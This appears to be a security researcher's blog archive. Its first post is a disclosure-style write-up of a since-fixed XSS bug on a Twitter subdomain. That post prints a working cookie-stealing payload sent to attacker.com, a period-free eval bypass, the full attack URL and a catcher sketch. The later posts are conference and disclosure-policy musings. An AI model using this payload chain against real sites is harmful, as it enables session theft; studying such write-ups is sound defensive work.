Archive for the 'Uncategorized' Category

Monday, July 19th, 2010

Twitter XSS Bug

I recently came across an XSS vulnerability on Twitter.  99% of XSS bugs are fairly straightforward, and this bug was no exception.  Getting a simple alert box was easy, but creating a payload that actually does something valuable (steal the Twitter cookie, post on behalf of the victim, etc.) was an interesting exercise.  Nothing earth-shattering or new here, but I wanted to document this in case someone else runs into a similar situation.

Cookie scoping – Twitter.com has multiple subdomains, one of which is apiwiki.twitter.com.  APIwiki is meant to be a resource for developers looking to use the Twitter APIs.  Fortunately for the attacker (and unfortunately for Twitter), the session cookie that represents authentication is scoped to the parent Twitter domain (.twitter.com).

With such a widely scoped cookie, an XSS bug on any of the Twitter subdomains means I can steal the session cookie for www.twitter.com (which is where all the action takes place).  Subdomains like apiwiki.twitter.com typically receive less security attention than the flagship domain (for many reasons), but when the session cookie is scoped to the parent domain, XSS bugs on these overlooked subdomains have the same impact as XSS on the flagship domain.  Twitter should consider restricting the scope of their session cookie or moving nonessential content to an alternate domain.
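To make the scoping issue concrete, here's a quick sketch (not Twitter's actual code) of RFC 6265-style cookie domain matching, showing why a cookie with Domain=.twitter.com gets sent to every subdomain:

```javascript
// Illustration only: simplified RFC 6265 domain matching. A cookie whose
// Domain attribute is ".twitter.com" (or "twitter.com") is sent to the
// parent domain and every subdomain beneath it.
function domainMatches(host, cookieDomain) {
  const d = cookieDomain.replace(/^\./, '').toLowerCase(); // leading dot is ignored
  const h = host.toLowerCase();
  // A host matches if it equals the cookie domain or is a subdomain of it.
  return h === d || h.endsWith('.' + d);
}

console.log(domainMatches('www.twitter.com', '.twitter.com'));        // true
console.log(domainMatches('apiwiki.twitter.com', '.twitter.com'));    // true
console.log(domainMatches('apiwiki.twitter.com', 'www.twitter.com')); // false
```

Since apiwiki.twitter.com matches the parent-scoped domain, script running there can read (and exfiltrate) the same session cookie the flagship site relies on.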

The XSS bug – The actual XSS bug was found here:

http://apiwiki.twitter.com/sdiff.php?first=FrontPage&second=<XSS-HERE>

sdiff.php compares two different PHP files.  The query string parameters named "first" and "second" both expect a PHP filename.  If an invalid filename was provided, an exception would be thrown and an error message would be displayed.  The error message looked something like this:

Looking at the HTML source of the error page, we see the following stack trace in the HTML markup.  The stack trace contains our unsanitized, attacker-controlled values.  Classic XSS, straight out of web app security 101.

The Payload – Now here's where things got interesting.  Generating a quick alert-box payload was easy: I supplied the following value for the "second" parameter:

&second=--%3E%3Cbody%20onload=javascript:alert(1)%3E.php

Now, when I tried something a bit more complicated, I realized that any periods within the payload (other than the period in the trailing ".php") would generate a different stack trace.  This second stack trace did not contain any attacker-controlled data.  So essentially, I had to generate a JavaScript payload without any periods.  There are a couple of ways to do this… here's how I did it:

1:  I pulled up the actual payload I wanted to execute.  In this case, it was a simple JavaScript payload to grab the Twitter session cookie and send it to the attacker's webserver:

var stolencookies=escape(document.cookie);var domain=escape(document.location);var myImage=new Image();myImage.src="http://attacker.com/catcher.php?domain="+domain+"&cookie="+stolencookies;

2:  I appended this payload to the end of the attack URL using the # (hash) symbol.  Using the hash symbol is an old trick, primarily used to hide the XSS payload from the server.  The earliest reference I could find to the hash trick is an article written by Amit Klein back in 2005 (http://www.webappsec.org/projects/articles/071105.shtml).  In this case, I used the hash to get around the restrictions on my JavaScript payload.

&second=--%3E%3Cbody%20onload=javascript:alert(1)%3E.php#var stolencookies=escape(document.cookie);var domain=escape(document.location);var myImage=new Image();myImage.src="http://attacker.com/catcher.php?domain="+domain+"&cookie="+stolencookies;
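A quick way to see why the hash trick works: the fragment is stripped before the request leaves the browser, so the server (and its period filter) never sees it.  Node's URL parser illustrates the split (payload shortened here purely for illustration):

```javascript
// The fragment (everything after '#') is never sent in the HTTP request;
// it is purely client-side state, which is why a server-side filter on
// sdiff.php cannot reject the periods that appear after the hash.
const u = new URL('http://apiwiki.twitter.com/sdiff.php?first=FrontPage&second=x.php#var+stolen=1');
console.log(u.pathname + u.search); // what the server sees: "/sdiff.php?first=FrontPage&second=x.php"
console.log(u.hash);                // stays in the browser: "#var+stolen=1"
```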

3:  Now that my payload was ready, I needed to find a way to call the JavaScript after the hash character, but without any periods.  The JavaScript I want to execute is:  eval(document.location.hash.substr(1));  This would eval all the JavaScript following the hash mark.  Fortunately for us, everything in JavaScript is a property of an object and can be referenced in a couple of ways (for the most part).  For example, the location property belongs to the document object.  The most common way to access the location property is to call document.location, but you can also access it by calling document['location'].  This works for any property, and even functions, so our injected string without periods is:

eval(document['location']['hash']['substr'](1))

(kuza's eval(window['name']) should also work here)
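The dot/bracket equivalence is easy to verify with a stand-in object for the browser's document (plain Node, no DOM assumed):

```javascript
// Dot access and bracket access reach the same property, so any chain
// like a.b.c(x) can be rewritten period-free as a['b']['c'](x).
const doc = { location: { hash: '#alert(1)' } }; // stand-in for the real document
console.log(doc.location.hash === doc['location']['hash']); // true
// Period-free equivalent of document.location.hash.substr(1):
console.log(doc['location']['hash']['substr'](1)); // "alert(1)"
```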

The final URL looked like this:

http://apiwiki.twitter.com/sdiff.php?first=FrontPage&second=--%3E%3Cbody%20onload=javascript:eval(document['location']['hash']['substr'](1))%3E.php#var stolencookies=escape(document.cookie);var domain=escape(document.location);var myImage=new Image();myImage.src="http://attacker.com/catcher.php?domain="+domain+"&cookie="+stolencookies
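For completeness, the collection side is trivial.  catcher.php isn't shown in this post; as a purely hypothetical sketch (in Node rather than PHP, with made-up example values), the server-side logic amounts to parsing two query parameters out of the image request the payload fires:

```javascript
// Hypothetical stand-in for the attacker's catcher.php endpoint: pull the
// exfiltrated values out of the image-request URL. URLSearchParams undoes
// the percent-encoding that escape() applied in the payload.
function parseCatch(requestUrl) {
  const { searchParams } = new URL(requestUrl, 'http://attacker.com');
  return {
    domain: searchParams.get('domain'),
    cookie: searchParams.get('cookie'),
  };
}

// Example request as the payload's Image() fetch would produce it
// (cookie name and values are illustrative, not Twitter's actual data):
const hit = parseCatch('/catcher.php?domain=http%3A//twitter.com/home&cookie=_twitter_sess%3Dabc123');
console.log(hit.domain); // "http://twitter.com/home"
console.log(hit.cookie); // "_twitter_sess=abc123"
```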

I reported the bug to the Twitter security team and they addressed it in a timely manner.  It was a pleasure working with them.

Posted by xssniper | Filed in Uncategorized | 7 Comments »


Monday, March 30th, 2009

Catching Up!

Whew!  It's been a busy couple of months for me.  I'm always curious as to how I end up with so much on my plate.  A quick recap of some of the stuff I've been working on or have coming in the near future:


1) HITB Dubai is almost here!  I've been selected to give two talks at HITB in Dubai.  Although I've spent a significant amount of time in various parts of the Middle East, I've never actually been to Dubai.  Dhillon is always an EXCELLENT host and I'm looking forward to seeing the sights.  As for the talks I'll be giving in Dubai, the first (Biting the Hand that Feeds You – Reloaded) is an extension of a talk Nate McFeters and I gave at Defcon 15.  It covers a lot of interesting application design scenarios that introduce security weaknesses into modern-day web applications.  It's a very interesting collection of content-ownership issues, some funky ways to abuse web application sessions, and a demo of some attacks against modern-day web applications, including Twitter and Facebook (the respective security teams have already been notified).  For the second talk (Cross Domain Leakiness), I'll be co-presenting with Chris Evans from Google.  Chris is a super sharp guy and we'll be talking about some interesting browser bugs we've discovered, as well as some techniques to bypass SSL protection mechanisms.  I'm also looking forward to seeing Nitesh Dhanjani's talk (Psychotronica).  I've seen a sneak preview and it's a very powerful illustration of how we can piece together people's lives like jigsaw puzzles, learning more about them than they probably know about themselves!


2) Jeff Carr put out the second paper in the Grey Goose series (first paper here, second paper here).  Contact Jeff directly if you are interested in getting a GOVT-only version of the papers.  Jeff has assembled a crack team of intelligence specialists (many of whom wish to remain anonymous), pulling together an impressive cyber intelligence capability that probably rivals some state-sponsored intelligence agencies.  The team is small enough to allow for lightning-fast action without bureaucracy, but just large enough to bring an impressive intelligence eye to modern-day problems.  Jeff focuses on analysis related to politically motivated events around the world.  I'm proud to be a part of the Grey Goose team; it is exciting work and perfectly in line with my background.  Jeff and I will be traveling to Estonia in June to speak at the Conference on Cyber Warfare hosted by the NATO Cooperative Cyber Defence Centre of Excellence.  We'll be presenting a talk entitled "Sun Tzu was a Hacker," where we'll break down the various tactics and operations associated with a real-world attack against state servers.  We'll tie the various pieces back to traditional tactics/warfare via the concepts of Maneuver Warfare and Marine Corps Doctrinal Publication 1 (Warfighting).


3) My studies as an MBA student continue.  Once I finish this semester, I'll have two classes left.  I'm currently taking a finance class which is planting all sorts of great ideas on how to value the risk associated with information systems.  I think it's great that security researchers are seeing the value of bugs in both monetary and non-monetary terms (press, notoriety, etc.).  I see things like the No More Free Bugs (NMFB) campaign as financial declarations that a security researcher's time/effort/intelligence/creativity/determination is worth > $0.00.  It will be interesting to see how the next generation of security researchers/hackers will view the disclosure/NMFB paradigm and whether places like iDefense and TippingPoint will rise to "power" (if they haven't already) as vulnerability brokers.  Maybe one day we'll track vulnerability worth via stock ticker, trying to game when to sell.  I'm also interested to see whether web application bugs will ever have financial value that can be easily monetized.  How much is a Gmail XSS or CSRF worth?  Are there ways to monetize?


4) I'm co-authoring a book… more on this later


5) I've started a really cool project at work that will consume lots of time…


6) Oh yeah… I have a ~3-month-old baby girl who demands all my free time :)


Where does the time go?!?!

Posted by xssniper | Filed in Uncategorized | 2 Comments »


Wednesday, November 19th, 2008

Pwnichiwa from PacSec!

WOW, it’s been a busy couple of weeks!  I was in Tokyo last week for PacSec.  PacSec was a great time, there were some GREAT talks, and Dragos knows how to party!  I co-presented a talk entitled “Cross-Domain Leakiness: Divulging Sensitive Information and Attacking SSL Sessions” with Chris Evans from Google.  I’m curious if this was the first time in history a Google Guy and a Microsoft Guy got on stage together and talked about security…  Anyway, you can find the slides here:

Chris is a super smart guy and demo'd a ton of browser bugs, most of which he will eventually discuss on his blog (which you should check out).  I had a chance to demo a few bugs and went over some techniques to steal secure cookies over SSL connections for popular sites.  Now, before I get into the details of the Safari file-stealing bug that was recently patched (covered in the next post), I did want to talk a bit about WebKit.

<WARNING Non-Technical Content Follows!>

You were warned!  Some friends and I have been playing around with Safari (we've got a couple of bugs in the pipeline).  As everyone knows, Safari is based on the WebKit browser engine.  I think WebKit is a great browser engine, and apparently so does Google, because they use it for Google Chrome.  So, once I discover and report a vulnerability in Safari for Windows, Apple must also check Safari for Mac and Safari Mobile for iPhone.  Additionally, "someone" should probably let Google know, as their Chrome browser also takes a dependency on WebKit.  Now, who is this "someone"?  Is it the researcher?  Is it Apple?  Does the researcher have a responsibility to check whether this vulnerability affects Chrome?  Does Apple have a responsibility to give Google the details of a vulnerability reported to them?  Our situation works today because we've got great people working for Apple and Google (like Aaron and Chris) who have the means to cooperate and work for the greater good.  However, as security moves higher and higher on the marketing scorecards and becomes more and more of a "competitive advantage," at what point will goodwill stop and business sense take over?

Let's contemplate a scenario that isn't so black and white…  Let's say two vendors both take a dependency on WebKit.  An issue is discovered, but the differences in the two browsers make it so that the implementation of the fix is different.  Vendor A has a patch ready to go; Vendor B, on the other hand, has a more extensive problem and needs a few more days/weeks/months.  Should Vendor A wait for Vendor B to complete their patch process before protecting their own customers and pushing patches for their own products?

Let's flip the scenario… Let's say Vendor A has a vulnerability reported to them.  Vendor A determines that the issue is actually in WebKit.  Vendor A contacts Vendor B and discovers that Vendor B isn't affected… does this mean Vendor B knew about the issue, fixed it, and didn't tell Vendor A?  Do they have a responsibility to?

Posted by xssniper | Filed in Uncategorized | 1 Comment »